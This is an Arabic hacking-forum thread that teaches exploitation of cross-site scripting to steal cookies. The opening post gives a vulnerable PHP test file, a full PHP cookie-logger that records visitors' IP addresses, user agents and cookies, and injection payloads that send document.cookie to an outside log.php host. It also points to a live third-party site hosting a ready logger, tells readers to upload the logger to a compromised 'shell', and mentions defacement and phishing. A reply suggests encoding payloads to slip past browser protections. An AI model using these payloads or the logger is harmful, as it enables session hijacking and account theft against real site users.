[ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~

[bleu moon]

بسم الله الرحمآن الرحيم


ان شاء الله اليوم رح نشرح

\ اكتشاف تغرات xss
\ تعليق الآندكس من تغرات xss
\ سرقة كوكيز من تغرات xss



################

سرقة الكوكيز من تغرات xss

اولا لازم نقوم بتنصيب السيرفر الشخصي ع جهازنا

download

تانيا لازم يكون عندنا الموقع المصاب او السكربت
انا برمجة ملف عادي جدآآ ! مصاب بهذه التغره :nosweat:

نسميه مثلا ..~

xss.php

ومحتواه علشان تجربوآا معي الاستغلال الكامل لها ..~

<?
echo $_GET***91;'test'***93; ;

echo '<b>@nor15din</b>'
?>

طيب الآن نستعرض الملف المصاب مع المتغير !

~~~~~~~~~~~~
على فكره شباب !
تم شرح التغره من قبل في المنتدى ..~
يستحسن انكم تراجعوا هذا الرابط ..~

http://www.vbspiders.com/vb/t24758.html

&

http://www.vbspiders.com/vb/t22376.html
~~~~~~~~~~~~

طيب نتابع :nosweat:

طبعا كيف نكتشف التغره سهل كثير ..~
يعني تضيف الكود هذا

'"--></style></script>**********alert("Www.VbspiderS.Com")</script>

بعد المتغير ..~
رح ارفق لكم الكود في المرفقات مع كل حاجه !

طيب رح نضغط اوونتر ورح تشوف ان رساله ضهرت لنا في المتصفح ..~

تعال الآن نستفيد من التغره !
اولا التغره تقدر تسرق بها كوكيز الآدمن او الضحيه بصفه عامه ..~
تقدر تحقن اكواد html او تغره للمتصفح ملغومه بباتش علشان تخترق ..~
شو هاي الحلاوه ..~
ههه
انا رح اشرح لكم كيف تسرق الكوكيز ..~
اولا لازمنا ملف لوج علشان يسجل لنا الكوكيز والمعلومات في ملف txt

ملفات اللوج تكون خاصه
وهناك ملفات لووج تجيب لك معلومات كامله !
كوكيز + الوقت + التاريخ + ...
وفي نوع آخر عادي ..~
يعطيك الكوكيز فقط !
ههع
رح اعطيكم ملف لووج عندي كثير حلو :in_love:

طيب نشوف السورس كود بتاعوا ..~

<?php 


function GetIP() 
{ 
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) 
        $ip = getenv("HTTP_CLIENT_IP"); 
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) 
        $ip = getenv("HTTP_X_FORWARDED_FOR"); 
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) 
        $ip = getenv("REMOTE_ADDR"); 
    else if (isset($_SERVER***91;'REMOTE_ADDR'***93;) && $_SERVER***91;'REMOTE_ADDR'***93; && strcasecmp($_SERVER***91;'REMOTE_ADDR'***93;, "unknown")) 
        $ip = $_SERVER***91;'REMOTE_ADDR'***93;; 
    else 
        $ip = "unknown"; 
    return($ip); 
} 

function logData() 
{ 
    $ipLog="nor15din.txt"; 
    $****** = $_SERVER***91;'QUERY_STRING'***93;; 
    $register_globals = (bool) ini_get('register_gobals'); 
    if ($register_globals) $ip = getenv('REMOTE_ADDR'); 
    else $ip = GetIP(); 

    $rem_port = $_SERVER***91;'REMOTE_PORT'***93;; 
    $user_agent = $_SERVER***91;'HTTP_USER_AGENT'***93;; 
    $rqst_method = $_SERVER***91;'METHOD'***93;; 
    $rem_host = $_SERVER***91;'REMOTE_HOST'***93;; 
    $referer = $_SERVER***91;'HTTP_REFERER'***93;; 
    $date=date ("l dS of F Y h:i:s A"); 
    $log=fopen("$ipLog", "a+"); 

    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog)) 
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | ******:  $****** <br>"); 
    else 
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | ******:  $****** \n\n"); 
    fclose($log); 
} 

logData();

echo '<b>powered by vbspiders team</b>'
?>

لازم نرفعوا على شل
انا عندي مرفوع على شل ..~


الموقع يلي رفعنا لو الووج رح يكون زي هيك مثلا !

www.vbspiders.com/log.php

ورح يسجل لنا المعلوومات في ملف اسموا nor15din.txt

www.vbspiders.com/nor15din.txt

:fruits_cherry:

طيب الآن كيف نستغل التغره ..~


يلزمنى كود تلغيم ..~

"><a href="#" onclick="********.location='http://vbspiders.com/log.php?******=' +escape(********.******);"><Click Me></a></script>

or

"><script language= "JavaScript">********.location="http://vbspiders.com/log.php?******=" + ********.******;********.location="http://www.google.com"</script>

حلو !
رح نضيف هذول الاكواد مع تغير مايجب تغيره

http://localhost/xss.php?test="><a href="#" onclick="********.location='http://vbspiders.com/log.php?******=' +escape(********.******);"><Click Me></a></script>

نضط اوونتر ونروح نفتح الملف nor15din.txt

IP: | PORT: 56840 | HOST: | Agent: | METHOD: | REF: | DATE: | ******: ******=

ههههه حلو ..~
ياريت اي واحد ينقل الموضوع ..~
يحافض على الحقوق

:sadwalk:


لتحميل الادواة

~~~~~~~~~~~~~~~~~~

الشي يلي اضفناه وجديد هو اننا شرحنا كل شي تقريبا يتعلق بهذه التغره في فيديوا + صفحه HTML

:showoff:

لتحميل الشرح الكامل على شكل صفحه HTML

لتحميل فيديوا التطبيق

وفي الاخير هذيه بسيطه وهي ملف لوج مرفوووع وجاهز

http://www.illicitromance.com/log.php

وفي هذه الصفحه رح يتم تسجيل الكوكيز + المعلومات

http://www.illicitromance.com/nor15din.txt

ع فكره هذه طريقة اخرى لتعليق آندكس مميز من تغرات

xss

http://www.vbspiders.com/vb/t38054.html

~~~~~~~~~~~~

وهنا طريقة اخرى لاستغلال التغره مشروحة من طرف حبيبنا

IronMan

:bleh:

جديد استخدامات xss وهي الـ phishing login




بالتوفيق ..
@nor15din


​

 

[Crazy Dz]

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~

بارك الله فيك علي شرح ثغرة قوية
​

 

[k4$p3r-MA]

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~

:icon30::icon30: بارك الله فيك

 

[bleu moon]

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~

بارك الله فيك علي شرح ثغرة قوية
​

والله تغره قويه خصوصا اذا كانت من نوع stored xss

:blushing:

 

[bleu moon]

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~

woooow thx fun بارك الله فيك

thx fun :schmoll:

شفتني العب مع القرده ؟

-------------------------------------

برب بمزح ههه
يعطيك العافيه يا حبيبي كاسبر !
الشرح فيديوا يلي قلت لي عنه رح انزلوا لك ان شاء الله

 

[Dr.Mix]

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~

مشكووووووووور اخ نورد الدين على الشرح الوافي ماشاء الله عليك دائما متوفق سلآم

 

[bleu moon]

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~

مشكووووووووور اخ نورد الدين على الشرح الوافي ماشاء الله عليك دائما متوفق سلآم

يعطيك العافيه ..~

:2:

 

[Antivirus7]

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~

وعليــكم السـلآم و رحمة الله
الله يعطيـك العآفية حبيبي نورالدين
شرح ممتآز تســلم أيديك :icon30:
تقبل مروري
:smile:

 

[bleu moon]

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~

وعليــكم السـلآم و رحمة الله
الله يعطيـك العآفية حبيبي نورالدين
شرح ممتآز تســلم أيديك :icon30:
تقبل مروري
:smile:

منور الموضوع يا حلو والله
تسلم على المرور العطر

:blush-anim-cl:

 

[DR.THMoORY]

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~

بطل حبيبي..
يسلمو ايديك..

 

[bleu moon]

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~

بطل حبيبي..
يسلمو ايديك..

منور الموضوع يا حبيبي

:fruits_cherry:

 

[mass1993]

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~

يعطيك العافية اخوي عالشرح ...ولكن عندي استفسار:

انا عندي سيرفر شخصي اباتشي اصدار 2.5.8 ووضعت ملف الثغرة فيه وكل اشي تمام...ولكن لما كتبت هذا الكود بالمتصفح:

'"--></style></script>**********alert("Www.VBspiders.com")</script>

وضغطت انتر ما طلعلي تنبيه في المتصفح وطبعلي التاليي:

\'\"

ولكن لما كتبت الامر هذا :

'"--></style></script>**********alert(4444444)</script>

وضغطت انتر طلع التنبيه وكل اشي تمام...

ولكن لما اجيت احط هذا الامر:

"><a href="#" onclick="********.location='http://localhost/log.php' +escape(********.******);"><Click Me></a></script>

ورحت لملف nor15din ما لقيت اشي فيه...اخوي شو هالمشكلة بالله عليك وليش صار هيك معي؟؟؟

تحياتي

 

[bleu moon]

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~

يعطيك العافية اخوي عالشرح ...ولكن عندي استفسار:

انا عندي سيرفر شخصي اباتشي اصدار 2.5.8 ووضعت ملف الثغرة فيه وكل اشي تمام...ولكن لما كتبت هذا الكود بالمتصفح:

'"--></style></script>**********alert("Www.VBspiders.com")</script>

وضغطت انتر ما طلعلي تنبيه في المتصفح وطبعلي التاليي:

\'\"

ولكن لما كتبت الامر هذا :

'"--></style></script>**********alert(4444444)</script>

وضغطت انتر طلع التنبيه وكل اشي تمام...

ولكن لما اجيت احط هذا الامر:

"><a href="#" onclick="********.location='http://localhost/log.php' +escape(********.******);"><Click Me></a></script>

ورحت لملف nor15din ما لقيت اشي فيه...اخوي شو هالمشكلة بالله عليك وليش صار هيك معي؟؟؟

تحياتي

انت رافع ملف الوج على السيرفرا الشخصي وهذا غلط !
لازم يكون ع شل

:2:

 

[dragonnet]

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~

مشكور صديقي !!

 

[bleu moon]

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~

مشكور صديقي !!

:2:

 

[Cyber Code]

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~

good job
keep up
​

 

[bleu moon]

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~

good job
keep up
​

:bleh:

 

[ZrIqE ViRuS]

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~

يعطيك الف الف عافيه يا غالي.........

يعطيك العافية اخوي عالشرح ...ولكن عندي استفسار:

انا عندي سيرفر شخصي اباتشي اصدار 2.5.8 ووضعت ملف الثغرة فيه وكل اشي تمام...ولكن لما كتبت هذا الكود بالمتصفح:

'"--></style></script>**********alert("Www.VBspiders.com")</script>

وضغطت انتر ما طلعلي تنبيه في المتصفح وطبعلي التاليي:

\'\"

ولكن لما كتبت الامر هذا :

'"--></style></script>**********alert(4444444)</script>

وضغطت انتر طلع التنبيه وكل اشي تمام...

ولكن لما اجيت احط هذا الامر:

"><a href="#" onclick="********.location='http://localhost/log.php' +escape(********.******);"><Click Me></a></script>

ورحت لملف nor15din ما لقيت اشي فيه...اخوي شو هالمشكلة بالله عليك وليش صار هيك معي؟؟؟

تحياتي

اممممممممم
هاد السر بهاي الثغره والي محتكرها المحترفين ......!!
بتعرف شغله

انت لازم تضع الاستغلال بداخل صفحه
html
وتشفر الاستغلال
وبعد تشفر صفحه
html

اعملك شويه بحث وصدقني رح تزبط معاك

السبب بانه ما زبط معاك هو المتصفحات الحديثه بتعمل شويه حمايه لها من هاي الثغره
لكن التشفير ما عليه حمايه ......



مشكور يا نوووووور كثير ع تعبك وشرحك
وفقت حبيبي

 

[bleu moon]

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~

يعطيك العافيه حبيبي فولكانو

 

[اجتياح الجراد]

رد: استغلال xss ..~ حتى استخراج الكوكيز ..~

الشرح جميل جدا وممتاز على الي يعانو من هذه الثغرة

والله الاخ ما قصر في شرحها واصل حبيبي